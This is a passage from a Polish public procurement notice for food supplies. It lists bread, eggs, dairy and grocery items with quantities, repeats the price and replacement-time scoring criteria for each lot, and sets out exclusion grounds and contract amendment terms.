towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4: Pieczywo<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Bułka pszenna zwykła 50g szt. 30000<br/>2 Chleb zwykły mieszany krojony 0,5 kg szt. 15000<br/>3 Chleb żytni razowy 0,5 kg szt. 7000<br/>4 Bułeczka drożdżowa 100 g z nadzieniem szt. 5000<br/>5 Placek drożdżowy z kruszonką 0,5 kg szt. 200<br/>6 Ciasto sernik kg 100<br/>7 Ciasto makowiec kg 100<br/>8 Ciasto jabłecznik kg 200<br/>9 Ciasto babka w polewie kg 300<br/>10 Pączek 100 g szt. 800 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5: Jaja<br/><br/>Lp. Nazwa produktu jm. Ilość<br/>1 Jaja kurze szt. 6000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6: Nabiał<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Margaryna 250 g (w 100 g produktu 72 g tłuszczu) szt. 20<br/>2 Masło śmietankowe 200 g min. 82 % tłuszczu kg 600<br/>3 Mleko UHT 3,2 % 1 LITR litr 500<br/>4 Mleko w proszku pełne 500 g kg 500<br/>5 Ser typu feta 270g szt. 20<br/>6 Ser topiony kostka 100g szt. 600<br/>7 Ser żółty typu gouda kostka 250g szt. 50<br/>8 Ser żółty typu gouda kg 1000<br/>9 Ser capri 200g szt. 100<br/>10 Ser typu mozzarella 125 g szt. 100<br/>11 Ser topiony krążek 200 g (w 100 g produktu min. 19 g tłuszczu) op. 600<br/>12 Serek wiejski szt. 300<br/>13 Twaróg półtłusty 250 g kg 300<br/>14 Twaróg półtłusty krajanka kg 50<br/>15 Śmietana 18% 400 ml do zup i sosów litr 500<br/>16 Jogurt owocowy 115 g (w 100 g produktu: 13,5 g cukru, 10 g tłuszczu) szt. 2000<br/>17 Jogurt naturalny 150g szt. 1000<br/>18 Ser wędzony kg 10<br/>19 Serek typu mascarpone 250 g szt. 10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15530000-2 - Masło</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7: Różne produkty spożywcze<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Bazylia suszona otarta 230 g szt. 5<br/>2 Bułka tarta z pieczywa pszennego 0,5 kg szt. 1000<br/>3 Cukier biały kryształ kg 1000<br/>4 Cukier waniliowy op. 30-32 szt. op. 50<br/>5 Cukier puder 400 g op. 100<br/>6 Curry 900g op. 2<br/>7 Cynamon mielony 320 g op. 3<br/>8 Czosnek granulowany 1,05 kg op. 50<br/>9 Drożdże świeże 100 g op. 50<br/>10 Dżem z truskawek ekstra gładki 280 g szt. 500<br/>11 Dżem z brzoskwiń ekstra gładki 280 g szt. 500<br/>12 Fasola Jaś średnia 370 g op. 400<br/>13 Groch łuskany, pozbawiony łuski, połówki 500g op. 400<br/>14 Herbata czarna w saszetkach 100 szt. x 2 g op. 800<br/>15 Herbatka owocowo-ziołowa 20 szt. x 2 g op. 500<br/>16 Kakao gorzkie extra ciemne 150g op. 50<br/>17 Kasza jęczmienna wiejska 5 kg op. 1000<br/>18 Kasza manna błyskawiczna 400 g op. 500<br/>19 Napój kakaowy instant 300 g szt. 100<br/>20 Koncentrat pomidorowy 30 % w słoiku 200 ml szt. 1000<br/>21 Kurkuma 350 g szt. 20<br/>22 Kukurydza konserwowa w puszcze 340 g szt. 300<br/>23 Liść laurowy 80 g op. 300<br/>24 Majeranek 150 g op. 600<br/>25 Majonez słoik 70 % tłuszczu 310 g szt. 700<br/>26 Makaron spaghetti 3 kg szt. 200<br/>27 Makaron tagliatelle wstążki 3 kg szt. 100<br/>28 Makaron penne piórka 3 kg szt. 200<br/>29 Makaron literki, gwiazdki 250 g szt. 200<br/>30 Makaron świderki, muszelki, kolanka 5 kg szt. 300<br/>31 Mąka ziemniaczana 1 kg szt. 100<br/>32 Mąka pszenna tortowa typ 450 1 kg szt. 700<br/>33 Miód pszczeli wielokwiatowy 1 kg szt. 100<br/>34 Ocet spirytusowy 10% but. Szklana 500 ml szt. 100<br/>35 Ogórki konserwowe w słoiku 870 ml szt. 1400<br/>36 Oregano 200 g szt. 50<br/>37 Papryka mielona słodka 720 g szt. 100<br/>38 Pieprz ziołowy 600 g szt. 400<br/>39 Pieprz czarny mielony 820 g szt. 400<br/>40 Płatki kukurydziane śniadaniowe 1 kg szt. 100<br/>41 Proszek do pieczenia 30 szt. x 30 g szt. 50<br/>42 Ryż paraboliczny 5 kg szt. 700<br/>43 Ziele angielskie całe 600 g szt. 20<br/>44 Zioła prowansalskie 300 g szt. 20<br/>45 Budyń czekoladowy 1,02 kg szt. 30<br/>46 Budyń waniliowy 1,02 kg szt. 30<br/>47 Kisiel truskawkowy 1,3 kg szt. 60<br/>48 Ketchup łagodny dla dzieci 990 g szt. 50<br/>49 Syrop malinowy 5 l szt. 150<br/>50 Chrupki kukurydziane 40 g szt. 50<br/>51 Płatki zbożowe o smaku czekoladowym kulki 1 kg szt. 50<br/>52 Płatki owsiane górskie 500 g szt. 150<br/>53 Dynia pestka łuskana 500 g szt. 50<br/>54 Żurawina suszona 1 kg op. 100<br/>55 Orzechy ziemne bez łupinek 500 g szt. 20<br/>56 Musztarda stołowa 185 g szt. 150<br/>57 Słonecznik łuskany 1 kg szt. 10<br/>58 Przypawa do potraw typu Kucharek 5 kg szt. 80<br/>59 Pomidory pellati w puszce bez skóry 2,55 kg szt. 50<br/>60 Tuńczyk w sosie własnym puszka 170 g szt. 50<br/>61 Mąka kukurydziana 1 kg szt. 10<br/>62 Kasza bulgur 5 kg szt. 100<br/>63 Pasztet drobiowy w puszcze 160 g szt. 1500<br/>64 Żelatyna 1 kg szt. 20<br/>65 Sos sałatkowy 700 g szt. 15<br/>66 Galaretka truskawkowa 1,3 kg szt. 20<br/>67 Galaretka cytrynowa 1,3 kg szt. 20<br/>68 Galaretka pomarańczowa 1,3 kg szt. 20<br/>69 Oliwa z oliwek 1 l szt. 50<br/>70 Olej z pestek winogron 1 l szt. 50<br/>71 Dżem truskawkowy z kawałkami 900g szt. 10<br/>72 Ciasto francuskie chłodzone 375 g szt. 10<br/>73 Sos sojowy ciemny 625 ml szt. 10<br/>74 Kawa zbożowa 200 g szt. 100<br/>75 Majonez 3 kg szt. 50<br/>76 Olej 3 l szt. 50<br/>77 Rama Profi do smażenia 3,7 l szt. 20<br/>78 Sos boloński knorr 1 kg szt. 5<br/>79 Auszpik 0,7 kg szt. 5<br/>80 Przyprawa do kurczaka 1 kg szt. 10<br/>81 Sos ogrodowy 0,7 kg knorr szt. 10<br/>82 Sos koperkowy 0,7 kg knorr szt. 10<br/>83 Napój owocowy ze słomką 200 ml szt. 500<br/>84 Sól czosnkowa 1 kg szt. 20<br/>85 Pieczywo chrupkie 150 g szt. 200<br/>86 Wafle ryżowe 110 g szt. 100<br/>87 Ciastka bez cukru 300 g szt. 100<br/>88 Sok pomidorowy 1 l szt. 50<br/>89 Sok owocowy 1 l szt. 100<br/>90 Przyprawa do mięs 1 kg szt. 10<br/>91 Ryż 1 kg szt. 100<br/>92 Płatki owsiane 500g szt. 100<br/>93 Płatki jęczmienne 500 g szt. 100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15850000-1 - Produkty z ciasta makaronowego</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15890000-3 - Różne produkty spożywcze i produkty suszone</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje w trakcie realizacji zamówienia możliwość wprowadzenia następujących istotnych zmian postanowień umowy w zakresie:<br/>a) nazw, adresów oraz godzin poszczególnych dostaw, jeżeli będą one wynikać ze zmian w strukturze Zamawiającego lub Wykonawcy,<br/>b) w stosunku do osób – zmiany osób reprezentujących na skutek zmian organizacyjnych,<br/>c) ceny jednostkowe podane przez Wykonawcę mogą podlegać zmianom w czasie obowiązywania umowy na podstawie<br/>wniosku Wykonawcy lub Zamawiającego w następujących przypadkach:<br/>- zmiany stawki VAT na dane towary może nastąpić zmiana cen jednostkowych odpowiednio do stawki podatku;<br/>- jeżeli wskaźnik wzrostu cen towarów dla poszczególnych grup produktów (opublikowany przez Główny Urząd Statystyczny<br/>- wskaźnik zmiany cen żywności i napojów bezalkoholowych) w miesiącu złożenia wniosku, uległ zmianie o co najmniej 5 %<br/>w stosunku do wskaźnika wzrostu cen towarów dla poszczególnych grup produktów obowiązującego w miesiącu<br/>rozpoczęcia realizacji umowy. Przy czym każda ze stron ma prawo do dwukrotnej waloryzacji na swoją korzyść. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, 